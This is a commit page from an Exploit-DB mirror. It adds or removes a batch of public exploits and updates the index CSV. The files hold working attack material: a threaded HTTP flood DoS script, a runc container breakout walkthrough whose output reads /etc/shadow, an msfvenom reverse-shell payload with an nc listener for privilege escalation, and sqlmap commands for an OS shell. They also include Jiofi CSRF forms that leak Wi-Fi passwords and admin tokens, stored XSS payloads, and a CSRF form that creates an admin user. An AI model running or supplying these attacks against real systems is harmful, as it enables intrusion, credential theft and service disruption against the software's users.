bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-02-15

Browse source 
18 changes to exploits/shellcodes

Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)
MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC)
ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS)

runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1)
exacqVision ESM 5.12.2 - Privilege Escalation
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)
Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting
Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)

Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)
DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting
DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting
DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting
DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting
DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting
WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection
LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
Offensive Security 2019-02-15 05:01:54 +00:00
parent a4b18dada5
commit 5f3f5c8f09
16 changed files with 441 additions and 168 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

49
exploits/android/dos/46380.py Executable file
View file

@ -0,0 +1,49 @@
#!/usr/bin/python
#coding: utf-8
# *********************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * ApowerManager Remote Denial of Service (DoS) / Application Crash *
# *********************************************************************
# Exploit Title: ApowerManager - Phone Manager Remote Denial of Service (DoS) / Application Crash
# Date: 2019-02-14
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor Homepage: https://www.apowersoft.com/phone-manager
# Software Link: https://www.apkmonk.com/download-app/com.apowersoft.phone.manager/4_com.apowersoft.phone.manager_2019-01-08.apk/
# Version: <= ApowerManager - Phone Manager 3.1.7
# Tested on: Android
import sys, requests, threading, signal
def handler(signum, frame):
print '\nFinishing program...\n'
sys.exit(0)
if len(sys.argv) != 3:
print "\nUsage: python " + sys.argv[0] + " <ip_address> <port>\n"
print "Example: python apowermanager_dos.py 192.168.1.125 2333\n"
sys.exit(0)
def startAttack(url):
url_destination = url + '/?Key=PhoneRequestAuthorization'
headers = {'Origin': url, 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'es-ES,es;q=0.9,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Content-Type': 'text/plain;charset=UTF-8', 'accept': 'text/plain', 'Referer': url, 'Connection': 'keep-alive'}
r = requests.post(url_destination, headers=headers)
if __name__ == '__main__':
signal.signal(signal.SIGINT, handler)
url = 'http://' + sys.argv[1] + ':' + sys.argv[2]
threads = []
for i in xrange(0, 10000):
t = threading.Thread(target=startAttack, args=(url,))
threads.append(t)
for x in threads:
x.start()
for x in threads:
x.join()

33
exploits/hardware/webapps/46363.txt
View file

@ -1,33 +0,0 @@
# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7687
Description:
cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data.
1. Create a poc.html and insert
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert&#40;document.domain&#41;<&#47;script>pyk0j" />
<input type="hidden" name="mask" value="0" />
<input type="hidden" name="token" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>d
</html>
2. Send to victim(who is connected to the wifi network).
3. Post based Xss gets fired .
Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC.

41
exploits/hardware/webapps/46364.txt
View file

@ -1,41 +0,0 @@
# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7745
Description:
JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field.
POC-
1. Create a view.html and insert
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetWiFi&#95;Setting" />
<input type="hidden" name="Mask" value="0" />
<input type="hidden" name="result" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Send to victim(who is connected to the wifi network).
3. The response gives the current wifi password.
Example response-
{"Page":"GetWiFi_Setting","Mask":"0","result":"SUCCESS","ssid":"JioFi4_08FE5F","mode_802_11":"11bgn","tx_power":"MID",
"wmm":"Enable","wps_enable":"PushButton","wifi_security":"WPA2PSK","wpa_encryption_type":"AES",
"wpa_security_key":"leakedpassword",".....etc}
Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.

90
exploits/hardware/webapps/46365.txt
View file

@ -1,90 +0,0 @@
# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7746
Description:
JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset.
POC-
The exploit requires two csrf requests to be sent to the victim(logged to the web interface) connected to the Jiofi router.
1. First get admin tokens
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST">
<input type="hidden" name="type" value="getuser" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Example response-
{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"}
Choice A)Change wifi password to attacker's choice of the Jiofi 4(JMR 1140) router.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="SetWiFi&#95;Setting" />
<input type="hidden" name="Mask" value="0" />
<input type="hidden" name="result" value="0" />
<input type="hidden" name="ssid" value="JioFi4&#95;08FE5F" />
<input type="hidden" name="mode&#95;802&#95;11" value="11bgn" />
<input type="hidden" name="tx&#95;power" value="HIGH" />
<input type="hidden" name="wmm" value="Enable" />
<input type="hidden" name="wps&#95;enable" value="PushButton" />
<input type="hidden" name="wifi&#95;security" value="WPA2PSK" />
<input type="hidden" name="wpa&#95;encryption&#95;type" value="AES" />
<input type="hidden" name="wpa&#95;security&#95;key" value="Iamhacked" />
<input type="hidden" name="wep&#95;security&#95;key&#95;1" value="0" />
<input type="hidden" name="wep&#95;security&#95;key&#95;2" value="0" />
<input type="hidden" name="wep&#95;security&#95;key&#95;3" value="0" />
<input type="hidden" name="wep&#95;security&#95;key&#95;4" value="0" />
<input type="hidden" name="wep&#95;current&#95;default&#95;key" value="0" />
<input type="hidden" name="channel&#95;mode" value="automatic" />
<input type="hidden" name="channel&#95;selection" value="11" />
<input type="hidden" name="sleep&#95;mode" value="Enable" />
<input type="hidden" name="sleep&#95;mode&#95;timer" value="30" />
<input type="hidden" name="ssid&#95;broadcast" value="Enable" />
<input type="hidden" name="enable&#95;wifi" value="Enable" />
<input type="hidden" name="token" value="leakedtokens" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Wifi Password changed to Iamhacked
Choice B) Perform Remote Factory Reset
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="type" value="FRST&#95;REAL" />
<input type="hidden" name="token" value="leakedtokens" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The router reboots to default settings.
Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.

81
exploits/linux/local/46369.md Normal file
View file

@ -0,0 +1,81 @@
## CVE-2019-5736 ##
This is exploit code for CVE-2019-5736 (and it works for both runc and LXC).
The simplest way to use it is to copy the exploit code into an existing
container, and run `make.sh`. However, you could just as easily create a bad
image and run that.
```console
% docker run --rm --name pwnme -dit ubuntu:18.10 bash
pwnme
% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar
```
We need to install `gcc` to build the exploit, and `runc` because we need to
have the shared libraries that `runc` would use. We don't actually use the
`runc` binary itself. For LXC, you would install `lxc` instead of `runc`.
```console
% docker attach pwnme
# apt-get update && apt-get install -y gcc runc
[ snip ]
# tar xf CVE-2019-5736.tar
# ./CVE-2019-5736/make.sh
```
And now, `/bin/bash` in the container will be able to **overwrite the host runc
binary**. Since this binary is often executed by `root`, this allows for
root-level code execution on the host.
```
% docker exec -it pwnme /bin/bash
[+] bad_libseccomp.so booted.
[+] opened ro /proc/self/exe <3>.
[+] constructed fdpath </proc/self/fd/3>
[+] bad_init is ready -- see </tmp/bad_init_log> for logs.
[*] dying to allow /proc/self/exe to be unused...
% cat /usr/sbin/docker-runc
#!/bin/bash
touch /w00t_w00t ; cat /etc/shadow
```
And now if you try to use Docker normally, the malicious script will execute
with root privileges:
```
% docker exec -it pwnme /bin/good_bash
OCI runtime state failed: invalid character 'b' looking for beginning of value: unknown
% file /w00t_w00t
/w00t_w00t: empty
```
And obviously `make.sh` can be modified to make the evil path anything you
like. If you want to get access to the container, use `/bin/good_bash`.
### License ###
```
Copyright (C) 2019 Aleksa Sarai <cyphar@cyphar.com>
Vulnerability discovered by Adam Iwaniuk and Borys Popławski.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to
deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
sell copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
* The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.
```
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip

16
exploits/php/webapps/46372.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-20009
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01
# After logging into the Domainmod application panel, browse to the
/assets/add/ssl-provider.php page and inject a javascript XSS payload
in ssl-provider-name, ssl-provider's-url "><img src=x
onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/88

16
exploits/php/webapps/46373.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-20010
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01
# After logging into the Domainmod application panel, browse to the
/assets/add/ssl-provider-account.php page and inject a javascript XSS
payload in username field "><img src=x
onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/88

16
exploits/php/webapps/46374.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-20011
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01
# After logging into the Domainmod application panel, browse to the
/assets/add/category.php page and inject a javascript XSS payload in
CatagoryName, StakeHolder fields "><img src=x
onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/88

14
exploits/php/webapps/46375.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19914
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01
# After logging into the Domainmod application panel, browse to the
/assets/add/dns.php page and inject a javascript XSS payload in
Profile Name & notes fields "><img src=x onerror=alert("XSSed-By-Abdul-Kareem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/87

15
exploits/php/webapps/46376.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Kareem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19915
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01
# After logging into the Domainmod application panel, browse to the
/assets/edit/host.php?whid=5 page and inject a javascript XSS payload
in "Web Host Name" & "Web Host's url fields "><img src=x
onerror=alert("XSSed-By-Abdul-Kareem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/87

58
exploits/php/webapps/46377.txt Normal file
View file

@ -0,0 +1,58 @@
# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability
# Date: 2018-12-28
# Exploit Author: B0UG
# Vendor Homepage: https://wpbookingcalendar.com/
# Software Link: https://wordpress.org/plugins/booking/
# Version: Tested on version 8.4.3 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-20556
#I. VULNERABILITY
Authenticated SQL Injection
#II. BACKGROUND
'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations.
#III. DESCRIPTION
An authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database.
#IV. PROOF OF CONCEPT
1) Access WordPress control panel.
2) Navigate to the Booking Calendar plugin page.
3) Set up Burp Suite to capture the traffic.
4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry.
5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'.
6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection:
• Boolean based blind injection
• Error based injection
• Time based injection
7) We can perform a time based SQL injection by appending ) AND SLEEP(100) AND (1=1 after the ID value in the parameter as shown below.
action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67
Obtaining a shell using sqlmap
-----------------------
• Obtain a SQL Shell
Sqlmap r post-request.txt p booking_id --sql-shell
• Obtain a Linux Shell
Sqlmap r post-request.txt p booking_id --os-shell
• Obtain a Windows Command Prompt
Sqlmap r post-request.txt p booking_id --os-cmd
#V. IMPACT
The vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability.
#VI. SYSTEMS AFFECTED
WordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected).
#VII. REMEDIATION
Uninstall the plugin until the vulnerability has been fixed by the developer.
#VIII. DISCLOSURE TIMELINE
#December 28, 2018 1: Vulnerability identified.
#December 28, 2018 2: Informed developer of the vulnerability.
#February 14, 2019 3: No communication received back from the developer.

38
exploits/php/webapps/46379.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: LayerBB 1.1.2 - Cross-Site Request Forgery
# Date: 10/4/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://forum.layerbb.com
# Version: 1.1.2
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-17996
1. Description:
LayerBB is a free open-source forum software, the CSRF allows creating a admin user.
2. Proof of Concept:
<!-- Create Admin User -->
<html>
<body>
<form action="http://localhost/[path]/admin/new_user.php" method="POST">
<label for="username">Username</label>
<input name="username" id="username" value="test" type="text">
<label for="password">Password</label>
<input name="password" id="password" value="password123" type="password">
<label for="email">Email Address</label>
<input name="email" id="email" value="test@localhost.co" type="text">
<label for="usergroup">Usergroup</label><br>
<select name="usergroup" id="usergroup" style="width:100%;"><option value="4">Administrator</option></select><br><br>
<input name="create" value="Create User" type="submit">
</form>
</body>
</html>
<!-- Create Admin User End -->
3. Solution:
Update to 1.1.3

26
exploits/windows/dos/46371.py Executable file
View file

@ -0,0 +1,26 @@
#Exploit Title: Core FTP/SFTP Server 1.2 - Build 589.42 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-13
#Vendor Homepage: http://www.coreftp.com/
#Software Link: http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe
#Tested Version: v2-Build 673
#Tested on: Windows 7 Service Pack 1 x32
#Steps to produce the crash:
#1.- Run python code: Core_FTP_SFTP_Server_1.2.py
#2.- Open core_code.txt and copy content to clipboard
#3.- Open Core FTP Server
#4.- Select "Setup" > "New"
#5.- Select "Domain Name" and Put "Test"
#6.- Select "Domain IP/Address" and Put "1.1.1.1"
#7.- Select "Base directory" and Choose a directory path
#8.- Enable "WinNT users"
#9.- Select "User domain" and Paste Clipboard
#10.- Click on "Ok" and the next window click "Ok"
#11.- Crashed
cod = "\x41" * 7000
f = open('core_code.txt', 'w')
f.write(cod)
f.close()

24
exploits/windows/dos/46378.py Executable file
View file

@ -0,0 +1,24 @@
# -*- coding: utf-8 -*-
# Exploit Title: MediaMonkey 4.1.23 - URL Denial of Service (PoC)
# Date: 13/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.mediamonkey.com/
# Software Link: https://www.mediamonkey.com/sw/MediaMonkey_4.1.23.1881.exe
# Version: 4.1.23.1881
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "MediaMonkey.py", it will create a new file "PoC.mp3"
# 2.- Open MediaMonkey.exe
# 3.- Go to File > Open URL or File...
# 4.- Click on button -> Browse... and select the 'PoC.mp3' file created
# 5.- Crashed
buffer = "http://127.0.0.1/"
badstr = "\x41" * 4000
buffer += badstr
buffer += ".mp3"
f = open ("PoC.mp3", "w")
f.write(buffer)
f.close()

75
exploits/windows/local/46370.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: exacqVision ESM 5.12.2 - Privilege Escalation
# Exploit Author: bzyo
# Twitter: @bzyo_
# Date: 2019-02-13
# Vulnerable Software:
# http://cdnpublic.exacq.com/5.12/exacqVisionEnterpriseSystemManager_5.12.2.150128_x86.exe
# Vendor Homepage: https://www.exacq.com
# Version: 5.12.2.150128
# Tested Windows 7 SP1 x86 and Windows 10 x64
# Description:
# exacqVision ESM 5.12.2 suffers from Privilege Escalation due to insecure file permissions
# Prerequisites
# Local, Low privilege access with restart capabilities
# Details
# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.
# A low privilege account is able to rename the enterprisesystemmanager.exe file located in
# this same path and replace with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service
# through the application, a restart of the computer triggers the execution of the malicious file.
# note: during install, you cannot choose a folder containing spaces i.e. "program files"
C:\>icacls exacqVisionEsm
exacqVisionEsm NT AUTHORITY\NETWORK SERVICE:(RX)
win7-32bit\bob:(RX)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
C:\>sc qc "exacqVision Enterprise System Manager Web Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: exacqVision Enterprise System Manager Web Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ESMWebService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Proof of Concept
1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.163 LPORT=443 -f exe > /var/www/html/enterprisesystemmanager.exe
2. Setup listener and ensure apache is running on attacking machine
nc -nlvvp 443
service apache2 start
3. Download malicious .exe on victim machine
Open browser to http://192.168.0.163/enterprisesystemmanager.exe and download
4. Rename C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe
enterprisesystemmanager.exe > enterprisesystemmanager.bak
5. Copy/Move downloaded enterprisesystemmanager.exe file to C:\exacqVisionEsm\EnterpriseSystemManager\
6. Restart victim machine and login as low privileged user
7. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system

17
files_exploits.csv
View file

@ -6307,6 +6307,9 @@ id,file,description,date,author,type,platform,port
46357,exploits/android/dos/46357.txt,"Android - binder Use-After-Free of VMA via race Between reclaim and munmap",2019-02-12,"Google Security Research",dos,android,
46358,exploits/asp/dos/46358.py,"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow",2019-02-12,"Kaustubh G. Padwad",dos,asp,80
46367,exploits/windows/dos/46367.py,"NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)",2019-02-13,"Alejandra Sánchez",dos,windows,
46371,exploits/windows/dos/46371.py,"Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)",2019-02-14,"Victor Mondragón",dos,windows,
46378,exploits/windows/dos/46378.py,"MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC)",2019-02-14,"Alejandra Sánchez",dos,windows,
46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS)",2019-02-14,s4vitar,dos,android,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10294,9 +10297,11 @@ id,file,description,date,author,type,platform,port
46341,exploits/linux/local/46341.rb,"Evince - CBT File Command Injection (Metasploit)",2019-02-11,Metasploit,local,linux,
46345,exploits/windows/local/46345.py,"Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure",2019-02-11,"Nathu Nandwani",local,windows,
46346,exploits/windows/local/46346.py,"River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)",2019-02-11,crash_manucoot,local,windows,
46359,exploits/linux/local/46359.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution",2019-02-12,feexd,local,linux,
46359,exploits/linux/local/46359.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1)",2019-02-12,feexd,local,linux,
46361,exploits/linux/local/46361.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)",2019-02-13,"Chris Moberly",local,linux,
46362,exploits/linux/local/46362.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)",2019-02-13,"Chris Moberly",local,linux,
46370,exploits/windows/local/46370.txt,"exacqVision ESM 5.12.2 - Privilege Escalation",2019-02-14,bzyo,local,windows,
46369,exploits/linux/local/46369.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)",2019-02-13,embargo,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40819,8 +40824,6 @@ id,file,description,date,author,type,platform,port
46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
46333,exploits/cgi/webapps/46333.txt,"Smoothwall Express 3.1-SP4 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,
46336,exploits/hardware/webapps/46336.html,"Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset",2019-02-11,"Adithyan AK",webapps,hardware,
46363,exploits/hardware/webapps/46363.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting",2019-02-13,"Ronnie T Baby",webapps,hardware,80
46364,exploits/hardware/webapps/46364.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80
46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,443
46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php,80
46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,
@ -40830,6 +40833,12 @@ id,file,description,date,author,type,platform,port
46352,exploits/linux/webapps/46352.rb,"Jenkins 2.150.2 - Remote Command Execution (Metasploit)",2019-02-12,AkkuS,webapps,linux,
46353,exploits/aspx/webapps/46353.cs,"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution",2019-02-12,"Dustin Cobb",webapps,aspx,
46354,exploits/php/webapps/46354.txt,"LayerBB 1.1.2 - Cross-Site Scripting",2019-02-12,0xB9,webapps,php,80
46365,exploits/hardware/webapps/46365.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80
46366,exploits/php/webapps/46366.txt,"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
46368,exploits/php/webapps/46368.txt,"PilusCart 1.4.1 - 'send' SQL Injection",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
46372,exploits/php/webapps/46372.txt,"DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,
46373,exploits/php/webapps/46373.txt,"DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80
